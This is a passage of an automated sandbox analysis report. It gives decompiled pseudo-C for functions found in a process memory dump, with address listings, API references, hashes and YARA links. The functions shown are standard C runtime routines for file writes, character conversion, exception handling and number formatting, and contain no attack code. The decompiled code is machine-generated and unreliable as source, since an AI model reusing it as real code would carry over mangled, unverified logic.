				signed int _t59;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t73;
				signed int _t74;
				signed int _t79;
				signed int _t87;
				signed int _t92;
				intOrPtr* _t96;
				void* _t97;

				_push(_t72);
				_t73 = _a8;
				if(_t73 == 0) {
					L4:
					_t50 = 0;
					L5:
					return _t50;
				}
				_t70 = _a12;
				if(_t70 == 0) {
					goto L4;
				}
				_t96 = _a16;
				_t100 = _t96;
				if(_t96 != 0) {
					__eflags = _a4;
					if(__eflags == 0) {
						goto L3;
					}
					__eflags = _t70 - (_t49 | 0xffffffff) / _t73;
					if(__eflags > 0) {
						goto L3;
					}
					_t92 = _t73 * _t70;
					__eflags =  *(_t96 + 0xc) & 0x0000010c;
					_t71 = _t92;
					if(( *(_t96 + 0xc) & 0x0000010c) == 0) {
						_t74 = 0x1000;
					} else {
						_t74 =  *(_t96 + 0x18);
					}
					_v8 = _t74;
					__eflags = _t92;
					if(_t92 == 0) {
						L34:
						_t50 = _a12;
						goto L5;
					} else {
						do {
							_t84 =  *(_t96 + 0xc) & 0x00000108;
							__eflags = _t84;
							if(_t84 == 0) {
								L18:
								__eflags = _t71 - _t74;
								if(_t71 < _t74) {
									_t57 = E003145A3( *_a4, _t96);
									__eflags = _t57 - 0xffffffff;
									if(_t57 == 0xffffffff) {
										L36:
										_t50 = (_t92 - _t71) / _a8;
										goto L5;
									}
									_a4 = _a4 + 1;
									_t71 = _t71 - 1;
									_t74 =  *(_t96 + 0x18);
									_v8 = _t74;
									__eflags = _t74;
									if(_t74 <= 0) {
										_t74 = 1;
										__eflags = 1;
										_v8 = 1;
									}
									goto L33;
								}
								__eflags = _t84;
								if(_t84 == 0) {
									L22:
									_t59 = _t71;
									__eflags = _t74;
									if(_t74 == 0) {
										_v12 = _t71;
									} else {
										_t84 = _t59 % _t74;
										_t59 = _t71 - _t59 % _t74;
										_v12 = _t59;
									}
									_push(_t59);
									_push(_a4);
									_push(E00319F9D(_t96));
									_t61 = E0031A24F(_t71, _t84, _t92, _t96, __eflags);
									_t97 = _t97 + 0xc;
									__eflags = _t61 - 0xffffffff;
									if(_t61 == 0xffffffff) {
										L35:
										_t43 = _t96 + 0xc;
										 *_t43 =  *(_t96 + 0xc) | 0x00000020;
										__eflags =  *_t43;
										goto L36;
									} else {
										_t79 = _v12;
										_t87 = _t79;
										__eflags = _t61 - _t79;
										if(_t61 <= _t79) {
											_t87 = _t61;
										}
										_a4 = _a4 + _t87;
										_t71 = _t71 - _t87;
										__eflags = _t61 - _t79;
										if(_t61 < _t79) {
											goto L35;
										} else {
											L29:
											_t74 = _v8;
											goto L33;
										}
									}
								}
								_t62 = E0030FF97(_t84, _t96);
								__eflags = _t62;
								if(_t62 != 0) {
									goto L36;
								}
								_t74 = _v8;
								goto L22;
							}
							_t63 =  *(_t96 + 4);
							_v12 = _t63;
							__eflags = _t63;
							if(__eflags == 0) {
								goto L18;
							}
							if(__eflags < 0) {
								goto L35;
							}
							__eflags = _t71 - _t63;
							if(_t71 < _t63) {
								_t63 = _t71;
								_v12 = _t71;
							}
							E0030EE10( *_t96, _a4, _t63);
							_t65 = _v12;
							_t97 = _t97 + 0xc;
							 *(_t96 + 4) =  *(_t96 + 4) - _t65;
							_t71 = _t71 - _t65;
							 *_t96 =  *_t96 + _t65;
							_a4 = _a4 + _t65;
							goto L29;
							L33:
							__eflags = _t71;
						} while (_t71 != 0);
						goto L34;
					}
				}
				L3:
				 *((intOrPtr*)(E0030E9C6(_t100))) = 0x16;
				E00314568();
				goto L4;
			}


























                                            0x00310504
                                            0x00310505
                                            0x0031050d
                                            0x0031052d
                                            0x0031052d
                                            0x0031052f
                                            0x00310535
                                            0x00310535
                                            0x0031050f
                                            0x00310514
                                            0x00000000
                                            0x00000000
                                            0x00310516
                                            0x00310519
                                            0x0031051b
                                            0x00310536
                                            0x0031053a
                                            0x00000000
                                            0x00000000
                                            0x00310543
                                            0x00310545
                                            0x00000000
                                            0x00000000
                                            0x00310549
                                            0x0031054c
                                            0x00310553
                                            0x00310555
                                            0x0031055c
                                            0x00310557
                                            0x00310557
                                            0x00310557
                                            0x00310561
                                            0x00310564
                                            0x00310566
                                            0x0031063f
                                            0x0031063f
                                            0x00000000
                                            0x0031056c
                                            0x0031056c
                                            0x0031056f
                                            0x0031056f
                                            0x00310575
                                            0x003105ad
                                            0x003105ad
                                            0x003105af
                                            0x00310617
                                            0x0031061e
                                            0x00310621
                                            0x0031064b
                                            0x00310651
                                            0x00000000
                                            0x00310651
                                            0x00310623
                                            0x00310626
                                            0x00310627
                                            0x0031062a
                                            0x0031062d
                                            0x0031062f
                                            0x00310633
                                            0x00310633
                                            0x00310634
                                            0x00310634
                                            0x00000000
                                            0x0031062f
                                            0x003105b1
                                            0x003105b3
                                            0x003105c7
                                            0x003105c7
                                            0x003105c9
                                            0x003105cb
                                            0x003105da
                                            0x003105cd
                                            0x003105cf
                                            0x003105d3
                                            0x003105d5
                                            0x003105d5
                                            0x003105dd
                                            0x003105de
                                            0x003105e8
                                            0x003105e9
                                            0x003105ee
                                            0x003105f1
                                            0x003105f4
                                            0x00310647
                                            0x00310647
                                            0x00310647
                                            0x00310647
                                            0x00000000
                                            0x003105f6
                                            0x003105f6
                                            0x003105f9
                                            0x003105fb
                                            0x003105fd
                                            0x003105ff
                                            0x003105ff
                                            0x00310601
                                            0x00310604
                                            0x00310606
                                            0x00310608
                                            0x00000000
                                            0x0031060a
                                            0x0031060a
                                            0x0031060a
                                            0x00000000
                                            0x0031060a
                                            0x00310608
                                            0x003105f4
                                            0x003105b6
                                            0x003105bc
                                            0x003105be
                                            0x00000000
                                            0x00000000
                                            0x003105c4
                                            0x00000000
                                            0x003105c4
                                            0x00310577
                                            0x0031057a
                                            0x0031057d
                                            0x0031057f
                                            0x00000000
                                            0x00000000
                                            0x00310581
                                            0x00000000
                                            0x00000000
                                            0x00310587
                                            0x00310589
                                            0x0031058b
                                            0x0031058d
                                            0x0031058d
                                            0x00310596
                                            0x0031059b
                                            0x0031059e
                                            0x003105a1
                                            0x003105a4
                                            0x003105a6
                                            0x003105a8
                                            0x00000000
                                            0x00310637
                                            0x00310637
                                            0x00310637
                                            0x00000000
                                            0x0031056c
                                            0x00310566
                                            0x0031051d
                                            0x00310522
                                            0x00310528
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                            • String ID:
                                            • API String ID: 2782032738-0
                                            • Opcode ID: 968457e186fe9c00490bb461027bae94e5830f662abfba4f89bb770b8509ae29
                                            • Instruction ID: ba8689ab624d183530cf9e34b31e81b3251538f39a8df88036a83dc3578e5282
                                            • Opcode Fuzzy Hash: 968457e186fe9c00490bb461027bae94e5830f662abfba4f89bb770b8509ae29
                                            • Instruction Fuzzy Hash: 2A41B3706046059FDB2E9F69C8805EE77A6EF89360B24852DE819CB580D7B1DDD08F50
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0032072D, Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0032072D(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E0030EA1A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E0031B5FA( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E0030E9C6(__eflags);
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}
















                                            0x00320735
                                            0x0032073a
                                            0x00320754
                                            0x00000000
                                            0x00320754
                                            0x0032073c
                                            0x00320741
                                            0x00000000
                                            0x00000000
                                            0x00320746
                                            0x00320763
                                            0x00320768
                                            0x0032076b
                                            0x00320772
                                            0x00320791
                                            0x00320798
                                            0x0032079a
                                            0x003207de
                                            0x003207ed
                                            0x003207fb
                                            0x003207fd
                                            0x0032080d
                                            0x0032080d
                                            0x00320811
                                            0x00320813
                                            0x00320816
                                            0x00320816
                                            0x00320816
                                            0x00320816
                                            0x00000000
                                            0x0032081c
                                            0x003207ff
                                            0x003207ff
                                            0x00320804
                                            0x00320804
                                            0x00320807
                                            0x00000000
                                            0x00320807
                                            0x0032079c
                                            0x0032079f
                                            0x003207a3
                                            0x003207cc
                                            0x003207cc
                                            0x003207cf
                                            0x003207cf
                                            0x00000000
                                            0x00000000
                                            0x003207d1
                                            0x003207d5
                                            0x00000000
                                            0x00000000
                                            0x003207d7
                                            0x003207d7
                                            0x00000000
                                            0x003207d7
                                            0x003207a5
                                            0x003207a8
                                            0x00000000
                                            0x00000000
                                            0x003207ac
                                            0x003207bf
                                            0x003207c5
                                            0x003207c8
                                            0x003207ca
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003207ca
                                            0x00320774
                                            0x00320777
                                            0x00320779
                                            0x0032077e
                                            0x0032077e
                                            0x00320783
                                            0x00000000
                                            0x00320783
                                            0x00320748
                                            0x0032074d
                                            0x00320751
                                            0x00320751
                                            0x00000000

                                            APIs
                                            • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00320763
                                            • __isleadbyte_l.LIBCMT ref: 00320791
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0031479A,00000001,00000000,00000000), ref: 003207BF
                                            • MultiByteToWideChar.KERNEL32(00000080,00000009,0031479A,00000001,00000000,00000000), ref: 003207F5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                            • String ID:
                                            • API String ID: 3058430110-0
                                            • Opcode ID: 58ca294fbda0998faf9ea27eda82aa552a35fdb3486e9e2c393a57552630ef42
                                            • Instruction ID: 1951025e5386ee3685f0722449c266dbab21eed6ae14fa331081339810d7f665
                                            • Opcode Fuzzy Hash: 58ca294fbda0998faf9ea27eda82aa552a35fdb3486e9e2c393a57552630ef42
                                            • Instruction Fuzzy Hash: 3D31D930600266AFDB278F79DC44BAB7FA9FF41310F164429E8249B192E731E855DB90
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00310E9B, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 22%
                                            			E00310E9B(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				void* _t29;
				intOrPtr _t30;
				void* _t31;
				intOrPtr* _t32;
				void* _t34;

				_t31 = __esi;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E003114DA(__ebx, _t30, __esi, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E0030F8DD(_t28);
				_push(_t31);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00311778(_t27, _t29, _t30, _t32, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00310C95(_t27, _t29, _t30, _t32, _t37);
				if(_t25 != 0) {
					E0030F8AB(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                                            0x00310e9b
                                            0x00310e9b
                                            0x00310e9e
                                            0x00310ea3
                                            0x00310ea6
                                            0x00310ea8
                                            0x00310eab
                                            0x00310eae
                                            0x00310eaf
                                            0x00310eb2
                                            0x00310eb7
                                            0x00310eb7
                                            0x00310eba
                                            0x00310ebe
                                            0x00310ec1
                                            0x00310ec6
                                            0x00310ec3
                                            0x00310ec3
                                            0x00310ec3
                                            0x00310ec9
                                            0x00310ece
                                            0x00310ecf
                                            0x00310ed2
                                            0x00310ed4
                                            0x00310ed7
                                            0x00310eda
                                            0x00310edb
                                            0x00310ee4
                                            0x00310ee9
                                            0x00310eec
                                            0x00310ef2
                                            0x00310ef5
                                            0x00310ef8
                                            0x00310efb
                                            0x00310efc
                                            0x00310eff
                                            0x00310f0a
                                            0x00310f0e
                                            0x00000000
                                            0x00310f0e
                                            0x00310f15

                                            APIs
                                            • ___BuildCatchObject.LIBCMT ref: 00310EB2
                                              • Part of subcall function 003114DA: ___AdjustPointer.LIBCMT ref: 00311523
                                            • _UnwindNestedFrames.LIBCMT ref: 00310EC9
                                            • ___FrameUnwindToState.LIBCMT ref: 00310EDB
                                            • CallCatchBlock.LIBCMT ref: 00310EFF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                            • String ID:
                                            • API String ID: 2633735394-0
                                            • Opcode ID: 82f03a8d6efc1e04fc6cbfb278a6b346684c2316dd7c2ea162f50a869836ad49
                                            • Instruction ID: 06c9b7e087a6344dc394cf763774a2200ef87b456b7871369fb707334cd76366
                                            • Opcode Fuzzy Hash: 82f03a8d6efc1e04fc6cbfb278a6b346684c2316dd7c2ea162f50a869836ad49
                                            • Instruction Fuzzy Hash: 5F011732000108BBCF265F55CC01EDB3BBAEF5C750F158514F91869160C372E8A19BA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00318ECD, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00318ECD(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E0031941E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00318F53(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00319699(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E003195D8(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                            0x00318ed0
                                            0x00318ed6
                                            0x00318f49
                                            0x00000000
                                            0x00318edd
                                            0x00318edd
                                            0x00318ee0
                                            0x00318efb
                                            0x00318efe
                                            0x00318f1e
                                            0x00318f30
                                            0x00318f00
                                            0x00318f00
                                            0x00318f03
                                            0x00000000
                                            0x00318f05
                                            0x00318f17
                                            0x00318f17
                                            0x00318f03
                                            0x00318f4e
                                            0x00318f52
                                            0x00318ee2
                                            0x00318efa
                                            0x00318efa
                                            0x00318ee0

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction ID: 0c81608db5f8e9db03a25377fd8dc7e30494f7246fb477b7723bf8bc2ffd175a
                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                            • Instruction Fuzzy Hash: E201487200414EBBCF1B5F84DC118EE3F67BB1D390B598425FA5898431CB36C9B2AB85
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00303CA0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 163COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 76%
                                            			E00303CA0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v116;
				intOrPtr _v120;
				char _v126;
				char _v127;
				long _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _t52;
				intOrPtr _t53;
				signed int _t56;
				short* _t57;
				int _t61;
				signed int _t65;
				intOrPtr _t67;
				signed int _t69;
				char _t71;
				intOrPtr _t73;
				signed char _t74;
				intOrPtr _t76;
				intOrPtr _t80;
				void* _t81;
				intOrPtr _t82;
				intOrPtr _t89;
				intOrPtr _t93;
				signed int _t96;
				signed int _t97;
				intOrPtr _t99;
				intOrPtr _t100;
				void* _t101;
				intOrPtr _t103;

				_t52 = _a16;
				_v120 = __ecx;
				_t76 =  *((intOrPtr*)(_t52 + 0x1c));
				_t80 =  *((intOrPtr*)(_t52 + 0x18));
				_t89 = _t76;
				if(_t89 > 0) {
					L8:
					_t53 = 0x24;
					_v136 = 0x24;
					L10:
					asm("movsd xmm1, [ebp+0x1c]");
					asm("cdq");
					_t81 = _t80 - _t53;
					asm("sbb edi, edx");
					_t73 = 0;
					_t67 = 0;
					_v140 = 0;
					_t56 =  *(_a16 + 0x14) & 0x00003000;
					_v132 = 0;
					if(_t56 != 0x2000) {
						L31:
						_t77 = _a16;
						_t57 =  &_v127;
						_v128 = 0x25;
						_t74 =  *(_a16 + 0x14);
						if((_t74 & 0x00000020) != 0) {
							_v127 = 0x2b;
							_t57 =  &_v126;
						}
						if((_t74 & 0x00000010) != 0) {
							 *_t57 = 0x23;
							_t57 = _t57 + 1;
						}
						 *_t57 = 0x2a2e;
						_t69 = _t74 & 0x00003000;
						if((_t74 & 0x00000004) == 0) {
							if(_t69 != 0x2000) {
								if(_t69 != 0x3000) {
									_t71 = 0x65 + (_t69 & 0xffffff00 | _t69 != 0x00001000) * 2;
								} else {
									_t71 = 0x61;
								}
								goto L45;
							}
							goto L41;
						} else {
							if(_t69 == 0x2000) {
								L41:
								_t71 = 0x66;
								L45:
								 *((char*)(_t57 + 2)) = _t71;
								asm("movsd [esp], xmm1");
								 *((char*)(_t57 + 3)) = 0;
								_t61 = swprintf( &_v116, 0x6c,  &_v128, _v136);
								_t82 = _a4;
								E003055B0(_v120, _t82, _a8, _a12, _t77, _a20,  &_v116, _v140, _v132, _t81, _t61);
								return _t82;
							}
							if(_t69 != 0x3000) {
								_t71 = 0x45 + (_t69 & 0xffffff00 | _t69 != 0x00001000) * 2;
							} else {
								_t71 = 0x41;
							}
							goto L45;
						}
					}
					asm("movapd xmm0, xmm1");
					asm("mulsd xmm0, [0x32bc08]");
					asm("ucomisd xmm0, xmm1");
					asm("lahf");
					_t96 = _t56 & 0x00000044;
					if(_t96 != 0) {
						goto L31;
					}
					asm("movsd xmm4, [0x32bc20]");
					asm("xorps xmm3, xmm3");
					asm("comisd xmm3, xmm1");
					_t65 = _t56 & 0xffffff00 | _t96 > 0x00000000;
					_t97 = _t65;
					if(_t97 != 0) {
						asm("xorpd xmm1, xmm4");
					}
					asm("movsd xmm0, [0x32bc18]");
					asm("comisd xmm1, xmm0");
					asm("movsd xmm2, [0x32bc10]");
					if(_t97 < 0) {
						L18:
						asm("comisd xmm1, xmm3");
						if(_t99 <= 0) {
							L29:
							if(_t65 != 0) {
								asm("xorpd xmm1, xmm4");
							}
							goto L31;
						}
						_t100 = _t76;
						if(_t100 < 0) {
							goto L29;
						}
						if(_t100 > 0) {
							L22:
							asm("movsd xmm0, [0x32bc00]");
							do {
								asm("comisd xmm0, xmm1");
								if(_t101 < 0 || _t67 >= 0x1388) {
									break;
								}
								_t81 = _t81 + 0xfffffff6;
								asm("mulsd xmm1, xmm2");
								asm("adc edi, 0xffffffff");
								_t67 = _t67 + 0xa;
								_t103 = _t76;
							} while (_t103 > 0 || _t103 >= 0 && _t81 >= 0xa);
							_v132 = _t67;
							goto L29;
						}
						_t101 = _t81 - 0xa;
						if(_t101 < 0) {
							goto L29;
						}
						goto L22;
					} else {
						while(_t73 < 0x1388) {
							asm("divsd xmm1, xmm2");
							_t73 = _t73 + 0xa;
							_t99 = _t73;
							asm("comisd xmm1, xmm0");
							if(_t99 >= 0) {
								continue;
							}
							break;
						}
						_v140 = _t73;
						goto L18;
					}
				}
				if(_t89 < 0 || _t80 == 0) {
					if(( *(_t52 + 0x14) & 0x00002000) == 0) {
						_t80 = 6;
						_t76 = 0;
					}
				}
				_t93 = _t76;
				if(_t93 < 0 || _t93 <= 0 && _t80 <= 0x24) {
					_t53 = _t80;
					_v136 = _t80;
					goto L10;
				} else {
					goto L8;
				}
			}


































                                            0x00303cac
                                            0x00303cb1
                                            0x00303cb5
                                            0x00303cb8
                                            0x00303cbb
                                            0x00303cbd
                                            0x00303ce0
                                            0x00303ce0
                                            0x00303ce5
                                            0x00303cf1
                                            0x00303cf1
                                            0x00303cf6
                                            0x00303cf7
                                            0x00303cfc
                                            0x00303cfe
                                            0x00303d00
                                            0x00303d02
                                            0x00303d09
                                            0x00303d0e
                                            0x00303d17
                                            0x00303dd2
                                            0x00303dd2
                                            0x00303dd5
                                            0x00303dd9
                                            0x00303dde
                                            0x00303de4
                                            0x00303de6
                                            0x00303deb
                                            0x00303deb
                                            0x00303df2
                                            0x00303df4
                                            0x00303df7
                                            0x00303df7
                                            0x00303dfa
                                            0x00303dff
                                            0x00303e08
                                            0x00303e36
                                            0x00303e42
                                            0x00303e51
                                            0x00303e44
                                            0x00303e44
                                            0x00303e44
                                            0x00000000
                                            0x00303e42
                                            0x00000000
                                            0x00303e0a
                                            0x00303e10
                                            0x00303e38
                                            0x00303e38
                                            0x00303e58
                                            0x00303e58
                                            0x00303e61
                                            0x00303e66
                                            0x00303e79
                                            0x00303e84
                                            0x00303e9f
                                            0x00303eae
                                            0x00303eae
                                            0x00303e18
                                            0x00303e27
                                            0x00303e1a
                                            0x00303e1a
                                            0x00303e1a
                                            0x00000000
                                            0x00303e18
                                            0x00303e08
                                            0x00303d1d
                                            0x00303d21
                                            0x00303d29
                                            0x00303d2d
                                            0x00303d2e
                                            0x00303d31
                                            0x00000000
                                            0x00000000
                                            0x00303d37
                                            0x00303d3f
                                            0x00303d42
                                            0x00303d46
                                            0x00303d49
                                            0x00303d4b
                                            0x00303d4d
                                            0x00303d4d
                                            0x00303d51
                                            0x00303d59
                                            0x00303d5d
                                            0x00303d65
                                            0x00303d80
                                            0x00303d80
                                            0x00303d84
                                            0x00303dca
                                            0x00303dcc
                                            0x00303dce
                                            0x00303dce
                                            0x00000000
                                            0x00303dcc
                                            0x00303d86
                                            0x00303d88
                                            0x00000000
                                            0x00000000
                                            0x00303d8a
                                            0x00303d91
                                            0x00303d91
                                            0x00303da0
                                            0x00303da0
                                            0x00303da4
                                            0x00000000
                                            0x00000000
                                            0x00303dae
                                            0x00303db1
                                            0x00303db5
                                            0x00303db8
                                            0x00303dbb
                                            0x00303dbb
                                            0x00303dc6
                                            0x00000000
                                            0x00303dc6
                                            0x00303d8c
                                            0x00303d8f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00303d67
                                            0x00303d67
                                            0x00303d6f
                                            0x00303d73
                                            0x00303d73
                                            0x00303d76
                                            0x00303d7a
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00303d7a
                                            0x00303d7c
                                            0x00000000
                                            0x00303d7c
                                            0x00303d65
                                            0x00303cbf
                                            0x00303ccc
                                            0x00303cce
                                            0x00303cd3
                                            0x00303cd3
                                            0x00303ccc
                                            0x00303cd5
                                            0x00303cd7
                                            0x00303ceb
                                            0x00303ced
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: swprintf
                                            • String ID: %$+
                                            • API String ID: 233258989-2626897407
                                            • Opcode ID: fd24ba247fb93d849a902834d0270662d69b5aa6e9517efd8c6a80644ad007c3
                                            • Instruction ID: 54d9c8b634589a50ec086c89230eaeb8ec42e2dac37226e467bfaa2e1462464f
                                            • Opcode Fuzzy Hash: fd24ba247fb93d849a902834d0270662d69b5aa6e9517efd8c6a80644ad007c3
                                            • Instruction Fuzzy Hash: 57516633816B458EDB27CE28C87176B779DAF92390F06871AF855672D1C730CA55C382
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00303EC0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 79%
